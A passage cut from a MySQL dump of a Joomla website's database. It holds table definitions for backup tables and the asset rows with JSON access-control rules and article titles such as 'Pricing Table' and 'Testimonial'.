default '', `username` varchar(150) NOT NULL default '', `email` varchar(100) NOT NULL default '', `password` varchar(100) NOT NULL default '', `usertype` varchar(25) NOT NULL default '', `block` tinyint(4) NOT NULL default '0', `sendEmail` tinyint(4) default '0', `gid` tinyint(3) unsigned NOT NULL default '1', `registerDate` datetime NOT NULL default '0000-00-00 00:00:00', `lastvisitDate` datetime NOT NULL default '0000-00-00 00:00:00', `activation` varchar(100) NOT NULL default '', `params` text NOT NULL, PRIMARY KEY (`id`) ) ENGINE=MyISAM AUTO_INCREMENT=103 DEFAULT CHARSET=utf8; SET character_set_client = @saved_cs_client; -- -- Dumping data for table `bak_fit_bss_users` -- LOCK TABLES `bak_fit_bss_users` WRITE; /*!40000 ALTER TABLE `bak_fit_bss_users` DISABLE KEYS */; /*!40000 ALTER TABLE `bak_fit_bss_users` ENABLE KEYS */; UNLOCK TABLES; -- -- Table structure for table `bak_fit_bss_vvcounter_logs` -- DROP TABLE IF EXISTS `bak_fit_bss_vvcounter_logs`; SET @saved_cs_client = @@character_set_client; SET character_set_client = utf8; CREATE TABLE `bak_fit_bss_vvcounter_logs` ( `time` int(10) unsigned NOT NULL default '0', `visits` mediumint(8) unsigned NOT NULL default '0', `guests` mediumint(8) unsigned NOT NULL default '0', `members` mediumint(8) unsigned NOT NULL default '0', `bots` mediumint(8) unsigned NOT NULL default '0' ) ENGINE=MyISAM DEFAULT CHARSET=utf8; SET character_set_client = @saved_cs_client; -- -- Dumping data for table `bak_fit_bss_vvcounter_logs` -- LOCK TABLES `bak_fit_bss_vvcounter_logs` WRITE; /*!40000 ALTER TABLE `bak_fit_bss_vvcounter_logs` DISABLE KEYS */; /*!40000 ALTER TABLE `bak_fit_bss_vvcounter_logs` ENABLE KEYS */; UNLOCK TABLES; -- -- Table structure for table `bak_fit_bss_webeecomment_comment` -- DROP TABLE IF EXISTS `bak_fit_bss_webeecomment_comment`; SET @saved_cs_client = @@character_set_client; SET character_set_client = utf8; CREATE TABLE `bak_fit_bss_webeecomment_comment` ( `id` int(10) unsigned NOT NULL auto_increment, `articleId` int(10) unsigned NOT NULL default '0', `content` text NOT NULL, `handle` text NOT NULL, `isUser` int(10) unsigned NOT NULL default '0', `email` text NOT NULL, `url` text, `published` int(10) unsigned NOT NULL default '0', `saved` datetime NOT NULL default '0000-00-00 00:00:00', `ordering` int(10) unsigned NOT NULL default '0', `hits` int(10) unsigned NOT NULL default '0', `ipAddress` text, PRIMARY KEY (`id`) ) ENGINE=MyISAM AUTO_INCREMENT=3 DEFAULT CHARSET=utf8; SET character_set_client = @saved_cs_client; -- -- Dumping data for table `bak_fit_bss_webeecomment_comment` -- LOCK TABLES `bak_fit_bss_webeecomment_comment` WRITE; /*!40000 ALTER TABLE `bak_fit_bss_webeecomment_comment` DISABLE KEYS */; /*!40000 ALTER TABLE `bak_fit_bss_webeecomment_comment` ENABLE KEYS */; UNLOCK TABLES; -- -- Table structure for table `bak_fit_bss_webeecomment_disabled` -- DROP TABLE IF EXISTS `bak_fit_bss_webeecomment_disabled`; SET @saved_cs_client = @@character_set_client; SET character_set_client = utf8; CREATE TABLE `bak_fit_bss_webeecomment_disabled` ( `id` int(10) unsigned NOT NULL auto_increment, `target_id` int(10) unsigned NOT NULL default '0', `type` text NOT NULL, PRIMARY KEY (`id`) ) ENGINE=MyISAM DEFAULT CHARSET=utf8; SET character_set_client = @saved_cs_client; -- -- Dumping data for table `bak_fit_bss_webeecomment_disabled` -- LOCK TABLES `bak_fit_bss_webeecomment_disabled` WRITE; /*!40000 ALTER TABLE `bak_fit_bss_webeecomment_disabled` DISABLE KEYS */; /*!40000 ALTER TABLE `bak_fit_bss_webeecomment_disabled` ENABLE KEYS */; UNLOCK TABLES; -- -- Table structure for table `bak_fit_bss_weblinks` -- DROP TABLE IF EXISTS `bak_fit_bss_weblinks`; SET @saved_cs_client = @@character_set_client; SET character_set_client = utf8; CREATE TABLE `bak_fit_bss_weblinks` ( `id` int(11) unsigned NOT NULL auto_increment, `catid` int(11) NOT NULL default '0', `sid` int(11) NOT NULL default '0', `title` varchar(250) NOT NULL default '', `alias` varchar(255) NOT NULL default '', `url` varchar(250) NOT NULL default '', `description` text NOT NULL, `date` datetime NOT NULL default '0000-00-00 00:00:00', `hits` int(11) NOT NULL default '0', `published` tinyint(1) NOT NULL default '0', `checked_out` int(11) NOT NULL default '0', `checked_out_time` datetime NOT NULL default '0000-00-00 00:00:00', `ordering` int(11) NOT NULL default '0', `archived` tinyint(1) NOT NULL default '0', `approved` tinyint(1) NOT NULL default '1', `params` text NOT NULL, PRIMARY KEY (`id`) ) ENGINE=MyISAM DEFAULT CHARSET=utf8; SET character_set_client = @saved_cs_client; -- -- Dumping data for table `bak_fit_bss_weblinks` -- LOCK TABLES `bak_fit_bss_weblinks` WRITE; /*!40000 ALTER TABLE `bak_fit_bss_weblinks` DISABLE KEYS */; /*!40000 ALTER TABLE `bak_fit_bss_weblinks` ENABLE KEYS */; UNLOCK TABLES; -- -- Table structure for table `bak_fit_bss_xmap_backup` -- DROP TABLE IF EXISTS `bak_fit_bss_xmap_backup`; SET @saved_cs_client = @@character_set_client; SET character_set_client = utf8; CREATE TABLE `bak_fit_bss_xmap_backup` ( `name` varchar(30) NOT NULL default '', `value` varchar(100) default NULL ) ENGINE=InnoDB DEFAULT CHARSET=latin1; SET character_set_client = @saved_cs_client; -- -- Dumping data for table `bak_fit_bss_xmap_backup` -- LOCK TABLES `bak_fit_bss_xmap_backup` WRITE; /*!40000 ALTER TABLE `bak_fit_bss_xmap_backup` DISABLE KEYS */; /*!40000 ALTER TABLE `bak_fit_bss_xmap_backup` ENABLE KEYS */; UNLOCK TABLES; -- -- Table structure for table `bak_fit_bss_xmap_ext_backup` -- DROP TABLE IF EXISTS `bak_fit_bss_xmap_ext_backup`; SET @saved_cs_client = @@character_set_client; SET character_set_client = utf8; CREATE TABLE `bak_fit_bss_xmap_ext_backup` ( `id` int(11) NOT NULL default '0', `extension` varchar(100) NOT NULL default '', `published` int(1) default '0', `params` text ) ENGINE=InnoDB DEFAULT CHARSET=latin1; SET character_set_client = @saved_cs_client; -- -- Dumping data for table `bak_fit_bss_xmap_ext_backup` -- LOCK TABLES `bak_fit_bss_xmap_ext_backup` WRITE; /*!40000 ALTER TABLE `bak_fit_bss_xmap_ext_backup` DISABLE KEYS */; /*!40000 ALTER TABLE `bak_fit_bss_xmap_ext_backup` ENABLE KEYS */; UNLOCK TABLES; -- -- Table structure for table `bak_fit_bss_xmap_sitemap_backup` -- DROP TABLE IF EXISTS `bak_fit_bss_xmap_sitemap_backup`; SET @saved_cs_client = @@character_set_client; SET character_set_client = utf8; CREATE TABLE `bak_fit_bss_xmap_sitemap_backup` ( `id` int(11) NOT NULL default '0', `name` varchar(255) default NULL, `expand_category` int(11) default NULL, `expand_section` int(11) default NULL, `show_menutitle` int(11) default NULL, `columns` int(11) default NULL, `exlinks` int(11) default NULL, `ext_image` varchar(255) default NULL, `menus` text, `exclmenus` varchar(255) default NULL, `includelink` int(11) default NULL, `usecache` int(11) default NULL, `cachelifetime` int(11) default NULL, `classname` varchar(255) default NULL, `count_xml` int(11) default NULL, `count_html` int(11) default NULL, `views_xml` int(11) default NULL, `views_html` int(11) default NULL, `lastvisit_xml` int(11) default NULL, `lastvisit_html` int(11) default NULL, `excluded_items` varchar(255) default NULL, `compress_xml` int(11) default NULL ) ENGINE=InnoDB DEFAULT CHARSET=latin1; SET character_set_client = @saved_cs_client; -- -- Dumping data for table `bak_fit_bss_xmap_sitemap_backup` -- LOCK TABLES `bak_fit_bss_xmap_sitemap_backup` WRITE; /*!40000 ALTER TABLE `bak_fit_bss_xmap_sitemap_backup` DISABLE KEYS */; /*!40000 ALTER TABLE `bak_fit_bss_xmap_sitemap_backup` ENABLE KEYS */; UNLOCK TABLES; -- -- Table structure for table `fit_assets` -- DROP TABLE IF EXISTS `fit_assets`; SET @saved_cs_client = @@character_set_client; SET character_set_client = utf8; CREATE TABLE `fit_assets` ( `id` int(10) unsigned NOT NULL auto_increment COMMENT 'Primary Key', `parent_id` int(11) NOT NULL default '0' COMMENT 'Nested set parent.', `lft` int(11) NOT NULL default '0' COMMENT 'Nested set lft.', `rgt` int(11) NOT NULL default '0' COMMENT 'Nested set rgt.', `level` int(10) unsigned NOT NULL COMMENT 'The cached level in the nested tree.', `name` varchar(50) NOT NULL COMMENT 'The unique name for the asset.\n', `title` varchar(100) NOT NULL COMMENT 'The descriptive title for the asset.', `rules` varchar(5120) NOT NULL COMMENT 'JSON encoded access control.', PRIMARY KEY (`id`), UNIQUE KEY `idx_asset_name` (`name`), KEY `idx_lft_rgt` (`lft`,`rgt`), KEY `idx_parent_id` (`parent_id`) ) ENGINE=InnoDB AUTO_INCREMENT=281 DEFAULT CHARSET=utf8; SET character_set_client = @saved_cs_client; -- -- Dumping data for table `fit_assets` -- LOCK TABLES `fit_assets` WRITE; /*!40000 ALTER TABLE `fit_assets` DISABLE KEYS */; INSERT INTO `fit_assets` VALUES (1,0,1,460,0,'root.1','Root Asset','{\"core.login.site\":{\"6\":1,\"2\":1},\"core.login.admin\":{\"6\":1},\"core.login.offline\":[],\"core.admin\":{\"8\":1},\"core.manage\":{\"7\":1},\"core.create\":{\"6\":1,\"3\":1},\"core.delete\":{\"6\":1},\"core.edit\":{\"6\":1,\"4\":1},\"core.edit.state\":{\"6\":1,\"5\":1},\"core.edit.own\":{\"6\":1,\"3\":1}}'),(2,1,2,3,1,'com_admin','com_admin','{}'),(3,1,4,11,1,'com_banners','com_banners','{\"core.admin\":{\"7\":1},\"core.manage\":{\"6\":1},\"core.create\":[],\"core.delete\":[],\"core.edit\":[],\"core.edit.state\":[]}'),(4,1,12,13,1,'com_cache','com_cache','{\"core.admin\":{\"7\":1},\"core.manage\":{\"7\":1}}'),(5,1,14,15,1,'com_checkin','com_checkin','{\"core.admin\":{\"7\":1},\"core.manage\":{\"7\":1}}'),(6,1,16,17,1,'com_config','com_config','{}'),(7,1,18,89,1,'com_contact','com_contact','{\"core.admin\":{\"7\":1},\"core.manage\":{\"6\":1},\"core.create\":[],\"core.delete\":[],\"core.edit\":[],\"core.edit.state\":[],\"core.edit.own\":[]}'),(8,1,90,291,1,'com_content','com_content','{\"core.admin\":{\"7\":1},\"core.manage\":{\"6\":1},\"core.create\":{\"3\":1},\"core.delete\":[],\"core.edit\":{\"4\":1},\"core.edit.state\":{\"5\":1},\"core.edit.own\":[]}'),(9,1,292,293,1,'com_cpanel','com_cpanel','{}'),(10,1,294,295,1,'com_installer','com_installer','{\"core.admin\":{\"7\":1},\"core.manage\":{\"7\":1},\"core.delete\":[],\"core.edit.state\":[]}'),(11,1,296,297,1,'com_languages','com_languages','{\"core.admin\":{\"7\":1},\"core.manage\":[],\"core.create\":[],\"core.delete\":[],\"core.edit\":[],\"core.edit.state\":[]}'),(12,1,298,299,1,'com_login','com_login','{}'),(13,1,300,301,1,'com_mailto','com_mailto','{}'),(14,1,302,303,1,'com_massmail','com_massmail','{}'),(15,1,304,305,1,'com_media','com_media','{\"core.admin\":{\"7\":1},\"core.manage\":{\"6\":1},\"core.create\":{\"3\":1},\"core.delete\":{\"5\":1},\"core.edit\":[],\"core.edit.state\":[]}'),(16,1,306,307,1,'com_menus','com_menus','{\"core.admin\":{\"7\":1},\"core.manage\":[],\"core.create\":[],\"core.delete\":[],\"core.edit\":[],\"core.edit.state\":[]}'),(17,1,37,38,1,'com_messages','com_messages','{\"core.admin\":{\"7\":1},\"core.manage\":{\"7\":1}}'),(18,1,310,347,1,'com_modules','com_modules','{\"core.admin\":{\"7\":1},\"core.manage\":[],\"core.create\":[],\"core.delete\":[],\"core.edit\":[],\"core.edit.state\":[]}'),(19,1,348,355,1,'com_newsfeeds','com_newsfeeds','{\"core.admin\":{\"7\":1},\"core.manage\":{\"6\":1},\"core.create\":[],\"core.delete\":[],\"core.edit\":[],\"core.edit.state\":[]}'),(20,1,356,357,1,'com_plugins','com_plugins','{\"core.admin\":{\"7\":1},\"core.manage\":[],\"core.create\":[],\"core.delete\":[],\"core.edit\":[],\"core.edit.state\":[]}'),(21,1,358,359,1,'com_redirect','com_redirect','{\"core.admin\":{\"7\":1},\"core.manage\":[]}'),(22,1,360,361,1,'com_search','com_search','{\"core.admin\":{\"7\":1},\"core.manage\":{\"6\":1}}'),(23,1,362,363,1,'com_templates','com_templates','{\"core.admin\":{\"7\":1},\"core.manage\":[],\"core.create\":[],\"core.delete\":[],\"core.edit\":[],\"core.edit.state\":[]}'),(24,1,364,365,1,'com_users','com_users','{\"core.admin\":{\"7\":1},\"core.manage\":[],\"core.create\":[],\"core.delete\":[],\"core.edit\":[],\"core.edit.state\":[]}'),(25,1,366,383,1,'com_weblinks','com_weblinks','{\"core.admin\":{\"7\":1},\"core.manage\":{\"6\":1},\"core.create\":{\"3\":1,\"10\":0,\"12\":0},\"core.delete\":[],\"core.edit\":{\"4\":1},\"core.edit.state\":{\"5\":1}}'),(26,1,384,385,1,'com_wrapper','com_wrapper','{}'),(34,8,107,110,2,'com_content.category.9','Uncategorised','{\"core.create\":{\"10\":0,\"12\":0},\"core.delete\":[],\"core.edit\":[],\"core.edit.state\":[]}'),(35,3,7,8,2,'com_banners.category.10','Uncategorised','{\"core.create\":[],\"core.delete\":[],\"core.edit\":[],\"core.edit.state\":[]}'),(36,7,23,24,2,'com_contact.category.11','Uncategorised','{\"core.create\":[],\"core.delete\":[],\"core.edit\":[],\"core.edit.state\":[]}'),(37,19,351,352,2,'com_newsfeeds.category.12','Uncategorised','{\"core.create\":[],\"core.delete\":[],\"core.edit\":[],\"core.edit.state\":[]}'),(38,25,373,374,2,'com_weblinks.category.13','Uncategorised','{\"core.create\":[],\"core.delete\":[],\"core.edit\":[],\"core.edit.state\":[]}'),(39,8,111,202,2,'com_content.category.14','Sample Data-Articles','{\"core.create\":[],\"core.delete\":[],\"core.edit\":[],\"core.edit.state\":[]}'),(40,3,9,10,2,'com_banners.category.15','Sample Data-Banners','{\"core.create\":[],\"core.delete\":[],\"core.edit\":[],\"core.edit.state\":[]}'),(41,7,25,86,2,'com_contact.category.16','Sample Data-Contact','{\"core.create\":[],\"core.delete\":[],\"core.edit\":[],\"core.edit.state\":[]}'),(42,19,353,354,2,'com_newsfeeds.category.17','Sample Data-Newsfeeds','{\"core.create\":[],\"core.delete\":[],\"core.edit\":[],\"core.edit.state\":[]}'),(43,25,375,382,2,'com_weblinks.category.18','Sample Data-Weblinks','{\"core.create\":[],\"core.delete\":[],\"core.edit\":[],\"core.edit.state\":[]}'),(44,39,112,127,3,'com_content.category.19','Joomla!','{\"core.create\":{\"10\":0,\"12\":0},\"core.delete\":[],\"core.edit\":[],\"core.edit.state\":[]}'),(56,43,376,377,3,'com_weblinks.category.31','Park Links','{\"core.create\":[],\"core.delete\":[],\"core.edit\":[],\"core.edit.state\":[]}'),(57,43,378,381,3,'com_weblinks.category.32','Joomla! Specific Links','{\"core.create\":[],\"core.delete\":[],\"core.edit\":[],\"core.edit.state\":[]}'),(58,57,379,380,4,'com_weblinks.category.33','Other Resources','{\"core.create\":[],\"core.delete\":[],\"core.edit\":[],\"core.edit.state\":[]}'),(59,41,26,27,3,'com_contact.category.34','Park Site','{\"core.create\":[],\"core.delete\":[],\"core.edit\":[],\"core.edit.state\":[]}'),(60,41,28,85,3,'com_contact.category.35','Shop Site','{\"core.create\":[],\"core.delete\":[],\"core.edit\":[],\"core.edit.state\":[]}'),(61,60,29,30,4,'com_contact.category.36','Staff','{\"core.create\":[],\"core.delete\":[],\"core.edit\":[],\"core.edit.state\":[]}'),(62,60,31,84,4,'com_contact.category.37','Fruit Encyclopedia','{\"core.create\":[],\"core.delete\":[],\"core.edit\":[],\"core.edit.state\":[]}'),(63,62,32,33,5,'com_contact.category.38','A','{\"core.create\":[],\"core.delete\":[],\"core.edit\":[],\"core.edit.state\":[]}'),(64,62,34,35,5,'com_contact.category.39','B','{\"core.create\":[],\"core.delete\":[],\"core.edit\":[],\"core.edit.state\":[]}'),(65,62,36,37,5,'com_contact.category.40','C','{\"core.create\":[],\"core.delete\":[],\"core.edit\":[],\"core.edit.state\":[]}'),(66,62,38,39,5,'com_contact.category.41','D','{\"core.create\":[],\"core.delete\":[],\"core.edit\":[],\"core.edit.state\":[]}'),(67,62,40,41,5,'com_contact.category.42','E','{\"core.create\":[],\"core.delete\":[],\"core.edit\":[],\"core.edit.state\":[]}'),(68,62,42,43,5,'com_contact.category.43','F','{\"core.create\":[],\"core.delete\":[],\"core.edit\":[],\"core.edit.state\":[]}'),(69,62,44,45,5,'com_contact.category.44','G','{\"core.create\":[],\"core.delete\":[],\"core.edit\":[],\"core.edit.state\":[]}'),(70,62,46,47,5,'com_contact.category.45','H','{\"core.create\":[],\"core.delete\":[],\"core.edit\":[],\"core.edit.state\":[]}'),(71,62,48,49,5,'com_contact.category.46','I','{\"core.create\":[],\"core.delete\":[],\"core.edit\":[],\"core.edit.state\":[]}'),(72,62,50,51,5,'com_contact.category.47','J','{\"core.create\":[],\"core.delete\":[],\"core.edit\":[],\"core.edit.state\":[]}'),(73,62,52,53,5,'com_contact.category.48','K','{\"core.create\":[],\"core.delete\":[],\"core.edit\":[],\"core.edit.state\":[]}'),(74,62,54,55,5,'com_contact.category.49','L','{\"core.create\":[],\"core.delete\":[],\"core.edit\":[],\"core.edit.state\":[]}'),(75,62,56,57,5,'com_contact.category.50','M','{\"core.create\":[],\"core.delete\":[],\"core.edit\":[],\"core.edit.state\":[]}'),(76,62,58,59,5,'com_contact.category.51','N','{\"core.create\":[],\"core.delete\":[],\"core.edit\":[],\"core.edit.state\":[]}'),(77,62,60,61,5,'com_contact.category.52','O','{\"core.create\":[],\"core.delete\":[],\"core.edit\":[],\"core.edit.state\":[]}'),(78,62,62,63,5,'com_contact.category.53','P','{\"core.create\":[],\"core.delete\":[],\"core.edit\":[],\"core.edit.state\":[]}'),(79,62,64,65,5,'com_contact.category.54','Q','{\"core.create\":[],\"core.delete\":[],\"core.edit\":[],\"core.edit.state\":[]}'),(80,62,66,67,5,'com_contact.category.55','R','{\"core.create\":[],\"core.delete\":[],\"core.edit\":[],\"core.edit.state\":[]}'),(81,62,68,69,5,'com_contact.category.56','S','{\"core.create\":[],\"core.delete\":[],\"core.edit\":[],\"core.edit.state\":[]}'),(82,62,70,71,5,'com_contact.category.57','T','{\"core.create\":[],\"core.delete\":[],\"core.edit\":[],\"core.edit.state\":[]}'),(83,62,72,73,5,'com_contact.category.58','U','{\"core.create\":[],\"core.delete\":[],\"core.edit\":[],\"core.edit.state\":[]}'),(84,62,74,75,5,'com_contact.category.59','V','{\"core.create\":[],\"core.delete\":[],\"core.edit\":[],\"core.edit.state\":[]}'),(85,62,76,77,5,'com_contact.category.60','W','{\"core.create\":[],\"core.delete\":[],\"core.edit\":[],\"core.edit.state\":[]}'),(86,62,78,79,5,'com_contact.category.61','X','{\"core.create\":[],\"core.delete\":[],\"core.edit\":[],\"core.edit.state\":[]}'),(87,62,80,81,5,'com_contact.category.62','Y','{\"core.create\":[],\"core.delete\":[],\"core.edit\":[],\"core.edit.state\":[]}'),(88,62,82,83,5,'com_contact.category.63','Z','{\"core.create\":[],\"core.delete\":[],\"core.edit\":[],\"core.edit.state\":[]}'),(104,44,113,114,4,'com_content.article.8','Beginners','{\"core.delete\":[],\"core.edit\":[],\"core.edit.state\":[]}'),(119,44,115,116,4,'com_content.article.21','Getting Help','{\"core.delete\":[],\"core.edit\":[],\"core.edit.state\":[]}'),(120,44,117,118,4,'com_content.article.22','Getting Started','{\"core.delete\":[],\"core.edit\":[],\"core.edit.state\":[]}'),(122,44,119,120,4,'com_content.article.24','Joomla!','{\"core.delete\":[],\"core.edit\":[],\"core.edit.state\":[]}'),(133,44,121,122,4,'com_content.article.35','Professionals','{\"core.delete\":[],\"core.edit\":[],\"core.edit.state\":[]}'),(146,44,123,124,4,'com_content.article.48','The Joomla! Project','{\"core.delete\":[],\"core.edit\":[],\"core.edit.state\":[]}'),(151,44,125,126,4,'com_content.article.53','Using Joomla!','{\"core.delete\":[],\"core.edit\":[],\"core.edit.state\":[]}'),(168,34,108,109,3,'com_content.article.67','What\'s New in 1.5?','{\"core.delete\":[],\"core.edit\":[],\"core.edit.state\":[]}'),(169,39,130,165,3,'com_content.category.77','Features','{\"core.create\":[],\"core.delete\":[],\"core.edit\":[],\"core.edit.state\":[],\"core.edit.own\":[]}'),(170,169,131,132,4,'com_content.article.68','Module Variations','{\"core.delete\":[],\"core.edit\":[],\"core.edit.state\":[]}'),(173,1,448,449,1,'com_finder','com_finder','{\"core.admin\":[],\"core.manage\":[]}'),(175,169,133,134,4,'com_content.article.69','Module Positions','{\"core.delete\":[],\"core.edit\":[],\"core.edit.state\":[]}'),(176,169,135,136,4,'com_content.article.70','Expose Base Template','{\"core.delete\":[],\"core.edit\":[],\"core.edit.state\":[]}'),(177,169,137,138,4,'com_content.article.71','Preset Styles','{\"core.delete\":[],\"core.edit\":[],\"core.edit.state\":[]}'),(178,169,139,140,4,'com_content.article.72','Custom Styling','{\"core.delete\":[],\"core.edit\":[],\"core.edit.state\":[]}'),(179,169,141,142,4,'com_content.article.73','Offline Page','{\"core.delete\":[],\"core.edit\":[],\"core.edit.state\":[]}'),(180,169,143,164,4,'com_content.category.78','Typography','{\"core.create\":[],\"core.delete\":[],\"core.edit\":[],\"core.edit.state\":[],\"core.edit.own\":[]}'),(181,180,144,145,5,'com_content.article.74','Typography','{\"core.delete\":[],\"core.edit\":[],\"core.edit.state\":[]}'),(182,180,146,147,5,'com_content.article.75','List','{\"core.delete\":[],\"core.edit\":[],\"core.edit.state\":[]}'),(183,180,148,149,5,'com_content.article.76','Table','{\"core.delete\":[],\"core.edit\":[],\"core.edit.state\":[]}'),(184,180,150,151,5,'com_content.article.77','Forms','{\"core.delete\":[],\"core.edit\":[],\"core.edit.state\":[]}'),(185,180,152,153,5,'com_content.article.78','Buttons','{\"core.delete\":[],\"core.edit\":[],\"core.edit.state\":[]}'),(186,180,154,155,5,'com_content.article.79','Notice & Alerts','{\"core.delete\":[],\"core.edit\":[],\"core.edit.state\":[]}'),(187,180,156,157,5,'com_content.article.80','Icons','{\"core.delete\":[],\"core.edit\":[],\"core.edit.state\":[]}'),(188,180,158,159,5,'com_content.article.81','Thumbnail & Media','{\"core.delete\":[],\"core.edit\":[],\"core.edit.state\":[]}'),(189,180,160,161,5,'com_content.article.82','Label & Badges','{\"core.delete\":[],\"core.edit\":[],\"core.edit.state\":[]}'),(190,180,162,163,5,'com_content.article.83','Misc','{\"core.delete\":[],\"core.edit\":[],\"core.edit.state\":[]}'),(191,8,203,234,2,'com_content.category.79','Pages','{\"core.create\":{\"6\":1,\"3\":1},\"core.delete\":{\"6\":1},\"core.edit\":{\"6\":1,\"4\":1},\"core.edit.state\":{\"6\":1,\"5\":1},\"core.edit.own\":{\"6\":1,\"3\":1}}'),(192,191,204,205,3,'com_content.article.84','About Us','{\"core.delete\":{\"6\":1},\"core.edit\":{\"6\":1,\"4\":1},\"core.edit.state\":{\"6\":1,\"5\":1}}'),(193,191,206,207,3,'com_content.article.85','Meet The Team','{\"core.delete\":{\"6\":1},\"core.edit\":{\"6\":1,\"4\":1},\"core.edit.state\":{\"6\":1,\"5\":1}}'),(194,39,166,167,3,'com_content.article.86','Services Page - 1','{\"core.delete\":{\"6\":1},\"core.edit\":{\"6\":1,\"4\":1},\"core.edit.state\":{\"6\":1,\"5\":1}}'),(196,191,208,217,3,'com_content.category.80','Slider','{\"core.create\":{\"6\":1,\"3\":1},\"core.delete\":{\"6\":1},\"core.edit\":{\"6\":1,\"4\":1},\"core.edit.state\":{\"6\":1,\"5\":1},\"core.edit.own\":{\"6\":1,\"3\":1}}'),(197,196,209,210,4,'com_content.article.87','Responsive Joomla Template','{\"core.delete\":{\"6\":1},\"core.edit\":{\"6\":1,\"4\":1},\"core.edit.state\":{\"6\":1,\"5\":1}}'),(198,196,211,212,4,'com_content.article.88','HTML5 and CSS3','{\"core.delete\":{\"6\":1},\"core.edit\":{\"6\":1,\"4\":1},\"core.edit.state\":{\"6\":1,\"5\":1}}'),(199,196,213,214,4,'com_content.article.89','TwitterBootstrapped','{\"core.delete\":{\"6\":1},\"core.edit\":{\"6\":1,\"4\":1},\"core.edit.state\":{\"6\":1,\"5\":1}}'),(200,196,215,216,4,'com_content.article.90','TwitterBootstrapped (2)','{\"core.delete\":{\"6\":1},\"core.edit\":{\"6\":1,\"4\":1},\"core.edit.state\":{\"6\":1,\"5\":1}}'),(201,191,218,219,3,'com_content.article.91','Service Page 1','{\"core.delete\":{\"6\":1},\"core.edit\":{\"6\":1,\"4\":1},\"core.edit.state\":{\"6\":1,\"5\":1}}'),(202,191,220,221,3,'com_content.article.92','Pricing Table','{\"core.delete\":{\"6\":1},\"core.edit\":{\"6\":1,\"4\":1},\"core.edit.state\":{\"6\":1,\"5\":1}}'),(203,7,87,88,2,'com_contact.category.81','Pages','{\"core.create\":{\"6\":1,\"3\":1},\"core.delete\":{\"6\":1},\"core.edit\":{\"6\":1,\"4\":1},\"core.edit.state\":{\"6\":1,\"5\":1},\"core.edit.own\":{\"6\":1,\"3\":1}}'),(204,191,222,223,3,'com_content.article.93','FAQ','{\"core.delete\":{\"6\":1},\"core.edit\":{\"6\":1,\"4\":1},\"core.edit.state\":{\"6\":1,\"5\":1}}'),(205,8,235,244,2,'com_content.category.82','Oman','{\"core.create\":{\"6\":1,\"3\":1},\"core.delete\":{\"6\":1},\"core.edit\":{\"6\":1,\"4\":1},\"core.edit.state\":{\"6\":1,\"5\":1},\"core.edit.own\":{\"6\":1,\"3\":1}}'),(206,191,232,233,3,'com_content.article.94','Portfolio Page','{\"core.delete\":{\"6\":1},\"core.edit\":{\"6\":1,\"4\":1},\"core.edit.state\":{\"6\":1,\"5\":1}}'),(207,225,254,255,3,'com_content.article.95','national bank of abu dhabi','{\"core.delete\":{\"6\":1},\"core.edit\":{\"6\":1,\"4\":1},\"core.edit.state\":{\"6\":1,\"5\":1}}'),(208,226,286,287,3,'com_content.article.96','Cross Browser','{\"core.delete\":{\"6\":1},\"core.edit\":{\"6\":1,\"4\":1},\"core.edit.state\":{\"6\":1,\"5\":1}}'),(209,226,288,289,3,'com_content.article.97','LESS based','{\"core.delete\":{\"6\":1},\"core.edit\":{\"6\":1,\"4\":1},\"core.edit.state\":{\"6\":1,\"5\":1}}'),(210,225,256,257,3,'com_content.article.98','Al Ramz','{\"core.delete\":{\"6\":1},\"core.edit\":{\"6\":1,\"4\":1},\"core.edit.state\":{\"6\":1,\"5\":1}}'),(211,205,236,237,3,'com_content.article.99','MSM','{\"core.delete\":{\"6\":1},\"core.edit\":{\"6\":1,\"4\":1},\"core.edit.state\":{\"6\":1,\"5\":1}}'),(212,205,238,239,3,'com_content.article.100','OAB','{\"core.delete\":{\"6\":1},\"core.edit\":{\"6\":1,\"4\":1},\"core.edit.state\":{\"6\":1,\"5\":1}}'),(213,205,240,241,3,'com_content.article.101','Portfolio 1 (7)',''),(214,205,242,243,3,'com_content.article.102','United','{\"core.delete\":{\"6\":1},\"core.edit\":{\"6\":1,\"4\":1},\"core.edit.state\":{\"6\":1,\"5\":1}}'),(215,39,168,169,3,'com_content.article.103','Portfolio Page 2','{\"core.delete\":{\"6\":1},\"core.edit\":{\"6\":1,\"4\":1},\"core.edit.state\":{\"6\":1,\"5\":1}}'),(216,191,226,227,3,'com_content.article.104','Parallax Slider','{\"core.delete\":{\"6\":1},\"core.edit\":{\"6\":1,\"4\":1},\"core.edit.state\":{\"6\":1,\"5\":1}}'),(217,191,224,225,3,'com_content.article.105','Xpert Slider','{\"core.delete\":{\"6\":1},\"core.edit\":{\"6\":1,\"4\":1},\"core.edit.state\":{\"6\":1,\"5\":1}}'),(218,8,245,252,2,'com_content.category.83','PSlider','{\"core.create\":{\"6\":1,\"3\":1},\"core.delete\":{\"6\":1},\"core.edit\":{\"6\":1,\"4\":1},\"core.edit.state\":{\"6\":1,\"5\":1},\"core.edit.own\":{\"6\":1,\"3\":1}}'),(219,218,246,247,3,'com_content.article.106','Packed with all Cutting Edge Features','{\"core.delete\":[],\"core.edit\":[],\"core.edit.state\":[]}'),(220,218,248,249,3,'com_content.article.107','Ready to Launch Business and App Site','{\"core.delete\":[],\"core.edit\":[],\"core.edit.state\":[]}'),(221,218,250,251,3,'com_content.article.108','Built with Expose and TwitterBootstrap','{\"core.delete\":[],\"core.edit\":[],\"core.edit.state\":[]}'),(222,191,228,229,3,'com_content.article.109','Testimonial','{\"core.delete\":{\"6\":1},\"core.edit\":{\"6\":1,\"4\":1},\"core.edit.state\":{\"6\":1,\"5\":1}}'),(223,191,230,231,3,'com_content.article.110','Coming Soon 